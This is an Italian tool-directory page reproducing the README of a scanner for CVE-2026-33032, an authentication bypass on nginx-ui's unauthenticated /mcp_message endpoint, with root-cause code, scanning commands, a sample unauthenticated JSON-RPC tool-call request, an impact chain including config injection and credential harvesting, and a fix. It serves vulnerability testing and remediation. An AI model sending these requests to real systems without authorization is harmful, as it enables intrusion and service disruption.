Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-33032-scanner — Scanner di vulnerabilità non distruttivo per il bypass dell'autenticazione dell'endpoint MCP di Nginx-UI (CVE-2026-33032) | Kitploit
Strumenti/GitHubGitHub/twinson333/cve-2026-33032-scanner
Scanner di VulnerabilitàExploitSicurezza WebPenetration TestingAutenticazioneSicurezza delle API
GitHubtwinson333/cve-2026-33032-scanner

cve-2026-33032-scanner

Scanner di vulnerabilità non distruttivo per il bypass dell'autenticazione dell'endpoint MCP di Nginx-UI (CVE-2026-33032)

Vedi Repository
32226 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner CVE-2026-33032

Scanner di vulnerabilità non distruttivo per il bypass dell'autenticazione dell'endpoint MCP di Nginx-UI

Panoramica della Vulnerabilità

CVE-2026-33032 è una vulnerabilità di bypass dell'autenticazione nell'integrazione Model Context Protocol (MCP) di nginx-ui. L'endpoint /mcp_message non dispone di middleware di autenticazione pur fornendo accesso a tutti gli strumenti MCP, consentendo a utenti remoti di:

  • Leggere le configurazioni e lo stato di nginx
  • Creare/modificare/eliminare file di configurazione nginx
  • Riavviare o ricaricare il servizio nginx
  • Esfiltrare dati di configurazione sensibili
  • Iniettare configurazioni dannose per l'intercettazione del traffico

Causa Principale

  1. Asimmetria di Autenticazione: L'endpoint /mcp richiede autenticazione, ma /mcp_message no:

    r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), ...)
    r.Any("/mcp_message", middleware.IPWhiteList(), ...)  // AuthRequired() mancante
    
  2. Whitelist IP Fail-Open: La whitelist IP predefinita è vuota, e il middleware la tratta come "consenti tutto"

  3. Entrambi gli Endpoint Condividono l'Handler: Entrambi instradano allo stesso mcp.ServeHTTP() che elabora tutte le invocazioni degli strumenti MCP

Funzionalità dello Scanner

✅ Test non distruttivo - Utilizza solo strumenti MCP di sola lettura
✅ Fingerprinting completo - Identifica le installazioni di nginx-ui
✅ Proof-of-concept sicuro - Nessuna modifica alla configurazione
✅ Scansione batch - Elabora più target da file
✅ Report dettagliati - Output JSON per l'integrazione

Installazione

# Clona o scarica lo scanner
git clone https://github.com/Twinson333/cve-2026-33032-scanner.git
cd cve-2026-33032
chmod +x cve-2026-33032-scanner.py

# Installa le dipendenze (se necessario)
pip3 install requests

Utilizzo

Scansione di Base

# Scansiona un singolo target
python3 cve-2026-33032-scanner.py -u http://target.com:9000

# Scansione con output verboso
python3 cve-2026-33032-scanner.py -u https://nginx-ui.example.com -v

# Timeout personalizzato
python3 cve-2026-33032-scanner.py -u http://192.168.1.100:9000 -t 15

Scansione Batch

# Scansiona più target da file
python3 cve-2026-33032-scanner.py -f targets.txt

# Con output verboso e report JSON
python3 cve-2026-33032-scanner.py -f targets.txt -v -o results.json

#Burp Pingback
python3 cve-2026-33032-scanner.py -u http://target.com:9000 --collaborator abc123.burpcollaborator.net

Formato del File dei Target

# targets.txt - un URL per riga
http://192.168.1.100:9000
https://nginx-ui.corp.com
http://10.0.0.50:9000

Come Funziona

Lo scanner esegue un processo di rilevamento in più fasi:

Fase 1: Fingerprinting

Verifica gli endpoint comuni di nginx-ui per identificare l'installazione:

  • /api/info - Informazioni sulla versione
  • /login - Pagina di accesso
  • /api/auth/login - Endpoint di autenticazione
  • /mcp e /mcp_message - Endpoint MCP

Fase 2: Verifica dell'Autenticazione

Testa l'endpoint /mcp per verificare che richieda correttamente l'autenticazione (baseline)

Fase 3: Sfruttamento della Vulnerabilità

Tenta chiamate agli strumenti MCP non distruttive tramite /mcp_message SENZA autenticazione:

  1. nginx_status (il più sicuro) - Legge lo stato del processo nginx
  2. nginx_config_list - Elenca i file di configurazione
  3. nginx_config_base_path - Ottiene il percorso della directory di configurazione

Se uno qualsiasi degli strumenti riesce senza autenticazione, la vulnerabilità è confermata.

Strumenti MCP Sicuri Utilizzati

Lo scanner invoca solo strumenti MCP di sola lettura:

StrumentoDescrizioneImpatto
nginx_statusLegge lo stato del servizio nginxNessuna modifica
nginx_config_listElenca i file di configurazioneNessuna modifica
nginx_config_base_pathOttiene il percorso della directory di configurazioneNessuna modifica

Strumenti esplicitamente evitati:

  • nginx_config_add - Creerebbe file
  • nginx_config_modify - Altererebbe le configurazioni
  • restart_nginx / reload_nginx - Interruzione del servizio
  • nginx_config_enable - Modificherebbe le configurazioni attive

Esempi di Output

Target Vulnerabile

[+] nginx-ui rilevato: Trovato 'nginx-ui' in /login
[+] Endpoint /mcp correttamente protetto

[*] Test dell'endpoint /mcp_message (CVE-2026-33032)...
  [*] Tentativo con strumento: nginx_status - Legge lo stato di nginx (il più sicuro)
      Stato: 200

======================================================================
[!] VULNERABILE a CVE-2026-33032
======================================================================
Prova: nginx_status eseguito con successo senza autenticazione

Target Protetto

[+] nginx-ui rilevato: Endpoint versione accessibile
[+] Endpoint /mcp correttamente protetto

[*] Test dell'endpoint /mcp_message (CVE-2026-33032)...
  [*] Tentativo con strumento: nginx_status - Legge lo stato di nginx (il più sicuro)
      Stato: 401
      Autenticazione richiesta (protetto) ✓

[+] NON vulnerabile - l'endpoint richiede autenticazione

Rimedio

Se la vulnerabilità è confermata:

  1. Correzione Immediata: Aggiungere il middleware di autenticazione a /mcp_message:

    r.Any("/mcp_message", middleware.IPWhiteList(), middleware.AuthRequired(),
        func(c *gin.Context) {
            mcp.ServeHTTP(c)
        })
    
  2. Difesa in Profondità:

    • Configurare la whitelist IP per negare tutto per impostazione predefinita
    • Limitare gli endpoint MCP al solo localhost se l'accesso esterno non è necessario
    • Implementare il rate limiting sugli endpoint MCP
  3. Aggiornamento: Passare alla versione patchata di nginx-ui quando disponibile

Divulgazione Responsabile

Questo strumento è progettato per:

  • ✅ Programmi di bug bounty
  • ✅ Test di penetrazione autorizzati
  • ✅ Ricerca sulla sicurezza con permesso
  • ✅ Validazione delle vulnerabilità prima della divulgazione

NON utilizzare questo strumento su sistemi che non possiedi o per cui non hai esplicito permesso di test.

Suggerimenti per il Bug Bounty

Quando segnali questa vulnerabilità:

  1. Gravità: Critica (CVSS 9.8+)

    • Accessibile dalla rete
    • Nessuna autenticazione richiesta
    • Compromissione completa del sistema
    • Esfiltrazione + modifica della configurazione
  2. Prova: Includi l'output dello scanner che mostra l'invocazione riuscita di uno strumento MCP senza autenticazione

  3. Catena di Impatto:

    • Accesso non autenticato → Lettura configurazione → Topologia backend rivelata
    • Scrittura configurazione → Iniezione proxy dannoso → Raccolta credenziali
    • Riavvio nginx → Interruzione del servizio → DoS
  4. PoC Sicuro: Utilizza solo gli strumenti di sola lettura (nginx_status, nginx_config_list)

Dettagli Tecnici

Formato di Invocazione degli Strumenti MCP

POST /mcp_message HTTP/1.1
Content-Type: application/json

{
  "jsonrpc": "2.0",
  "method": "tools/call",
  "params": {
    "name": "nginx_status",
    "arguments": {}
  },
  "id": 1
}

Risposta di Successo

{
  "jsonrpc": "2.0",
  "result": {
    "content": [
      {
        "type": "text",
        "text": "nginx è in esecuzione (PID: 1234)"
      }
    ]
  },
  "id": 1
}

Risposta Protetta

HTTP/1.1 401 Unauthorized
{
  "error": "autenticazione richiesta"
}

Riferimenti

  • CVE: CVE-2026-33032
  • Interessati: nginx-ui (versioni con integrazione MCP)
  • CVSS: 9.8 (Critica)
  • CWE: CWE-306 (Autenticazione Mancante per Funzione Critica)

Licenza

Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati.

Autore

Scarica lo strumento